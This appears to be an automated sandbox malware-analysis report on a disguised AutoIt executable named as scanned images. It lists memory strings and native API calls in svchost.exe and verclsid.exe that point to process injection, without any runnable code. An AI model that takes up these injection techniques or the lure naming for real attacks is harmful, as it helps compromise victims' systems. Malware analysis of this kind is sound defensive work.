                Source: Yara match | File source: 00000002.00000002.3549362625.0000000004810000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000000.1691214055.0000000000512000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_d220c422-a
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe, 00000000.00000000.1691214055.0000000000512000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_b0088d1d-f
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_26156bcc-0
                Source: Scanned-IMGS_from NomanGroup IDT.scr.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_cadccd65-7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C613 NtClose,1_2_0042C613
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040A903 NtAllocateVirtualMemory,1_2_0040A903
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B60 NtClose,LdrInitializeThunk,1_2_03972B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03972DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03972C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk,1_2_039735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974340 NtSetContextThread,1_2_03974340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03974650 NtSuspendThread,1_2_03974650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972B80 NtQueryInformationFile,1_2_03972B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BA0 NtEnumerateValueKey,1_2_03972BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BF0 NtAllocateVirtualMemory,1_2_03972BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972BE0 NtQueryValueKey,1_2_03972BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AB0 NtWaitForSingleObject,1_2_03972AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AD0 NtReadFile,1_2_03972AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972AF0 NtWriteFile,1_2_03972AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F90 NtProtectVirtualMemory,1_2_03972F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FB0 NtResumeThread,1_2_03972FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FA0 NtQuerySection,1_2_03972FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972FE0 NtCreateFile,1_2_03972FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F30 NtCreateSection,1_2_03972F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972F60 NtCreateProcessEx,1_2_03972F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E80 NtReadVirtualMemory,1_2_03972E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EA0 NtAdjustPrivilegesToken,1_2_03972EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972EE0 NtQueueApcThread,1_2_03972EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972E30 NtWriteVirtualMemory,1_2_03972E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DB0 NtEnumerateKey,1_2_03972DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972DD0 NtDelayExecution,1_2_03972DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D10 NtMapViewOfSection,1_2_03972D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D00 NtSetInformationFile,1_2_03972D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972D30 NtUnmapViewOfSection,1_2_03972D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CA0 NtQueryInformationToken,1_2_03972CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CC0 NtQueryVirtualMemory,1_2_03972CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972CF0 NtOpenProcess,1_2_03972CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C00 NtQueryInformationProcess,1_2_03972C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972C60 NtCreateKey,1_2_03972C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973090 NtSetValueKey,1_2_03973090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973010 NtOpenDirectoryObject,1_2_03973010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039739B0 NtGetContextThread,1_2_039739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D10 NtOpenProcessToken,1_2_03973D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03973D70 NtOpenThread,1_2_03973D70
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D4650 NtSuspendThread,LdrInitializeThunk,3_2_050D4650
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D4340 NtSetContextThread,LdrInitializeThunk,3_2_050D4340
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_050D2D10
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_050D2D30
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2DD0 NtDelayExecution,LdrInitializeThunk,3_2_050D2DD0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_050D2DF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2C60 NtCreateKey,LdrInitializeThunk,3_2_050D2C60
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_050D2C70
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_050D2CA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2F30 NtCreateSection,LdrInitializeThunk,3_2_050D2F30
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2FB0 NtResumeThread,LdrInitializeThunk,3_2_050D2FB0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2FE0 NtCreateFile,LdrInitializeThunk,3_2_050D2FE0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_050D2E80
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_050D2EE0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2B60 NtClose,LdrInitializeThunk,3_2_050D2B60
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_050D2BA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_050D2BE0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_050D2BF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2AD0 NtReadFile,LdrInitializeThunk,3_2_050D2AD0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2AF0 NtWriteFile,LdrInitializeThunk,3_2_050D2AF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D35C0 NtCreateMutant,LdrInitializeThunk,3_2_050D35C0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D39B0 NtGetContextThread,LdrInitializeThunk,3_2_050D39B0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2D00 NtSetInformationFile,3_2_050D2D00
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2DB0 NtEnumerateKey,3_2_050D2DB0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2C00 NtQueryInformationProcess,3_2_050D2C00
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2CC0 NtQueryVirtualMemory,3_2_050D2CC0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2CF0 NtOpenProcess,3_2_050D2CF0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2F60 NtCreateProcessEx,3_2_050D2F60
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2F90 NtProtectVirtualMemory,3_2_050D2F90
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2FA0 NtQuerySection,3_2_050D2FA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2E30 NtWriteVirtualMemory,3_2_050D2E30
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2EA0 NtAdjustPrivilegesToken,3_2_050D2EA0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2B80 NtQueryInformationFile,3_2_050D2B80
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D2AB0 NtWaitForSingleObject,3_2_050D2AB0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D3010 NtOpenDirectoryObject,3_2_050D3010
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D3090 NtSetValueKey,3_2_050D3090
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D3D10 NtOpenProcessToken,3_2_050D3D10
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_050D3D70 NtOpenThread,3_2_050D3D70
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030493D0 NtDeleteFile,3_2_030493D0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030492E0 NtReadFile,3_2_030492E0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_03049170 NtCreateFile,3_2_03049170
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_030495D0 NtAllocateVirtualMemory,3_2_030495D0
                Source: C:\Windows\SysWOW64\verclsid.exeCode function: 3_2_03049470 NtClose,3_2_03049470
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_004BD5EB
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004B1201
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004BE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004BE8F6
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004C20460_2_004C2046
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004580600_2_00458060
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004B82980_2_004B8298
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0048E4FF0_2_0048E4FF
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0048676B0_2_0048676B
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_004E48730_2_004E4873
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0045CAF00_2_0045CAF0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0047CAA00_2_0047CAA0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exeCode function: 0_2_0046CC390_2_0046CC39
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00486DD9
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_0046B119
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004591C0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00471394
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00471706
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_0047781B
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_0046997D
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00457920
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004719B0
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00477A4A
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00471C77
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00477CA7
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_004DBE44
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00489EEE
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_0045BF40
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_00471F32
                Source: C:\Users\user\Desktop\Scanned-IMGS_from NomanGroup IDT.scr.exe Code function: 0_2_01573B50
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004185B3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410093
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E10B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040E113
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402250
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00401210
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004023F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042EC23
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FE6A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402670
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FE73
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402F20
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004167DE
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004167E3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A003E6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394E3F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FA352
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C02C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E0274
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A001AA
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F41A2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F81CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DA118
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03930100
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039C8158
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D2000
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393C7C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03964750
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940770
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395C6E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A00591
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EE4F6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E4420
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F2446
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F6BD7
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039268B8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396E8F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03942840
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BEFA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03932FC8
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03960F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E2F30
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03982F28
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B4F40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952E90
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FCE93
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FEEDB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393AE0D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FEE26
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940E59
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03958DBF
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DCD1F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394AD00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E0CB5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03930CF2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940C00
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0398739A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F132D
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392D34C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039452A0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395B2C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395D2F0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E12ED
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394B1B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A0B16B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392F172
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0397516C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EF0CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039470C0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F70E9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FF0E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FF7B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F16CC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03985630
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DD5B0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03A095C3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F7571
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FF43F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03931460
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FB80
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B5BF0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0397DBF9
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FFB76
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DDAAC
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03985AA0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E1AA3
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EDAC6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FFA49
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F7A46
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B3A6C
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039D5910
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03949950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395B950
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039438E0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039AD800
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03941F92
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FFFB1
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03903FD2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03903FD5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FFF09
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03949EB0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FDC0
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F1D5A
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03943D40
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F7D73
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039FFCF2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B9C32
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A0535
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05160591
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05144420
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05152446
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0514E4F6
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050C4750
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050A0770
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0509C7C0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050BC6E0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05090100
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0513A118
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05128158
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051541A2
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051601AA
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051581CC
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05132000
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_0515A352
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051603E6
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050AE3F0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_05140274
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_051202C0
                Source: C:\Windows\SysWOW64\verclsid.exe Code function: 3_2_050AAD00
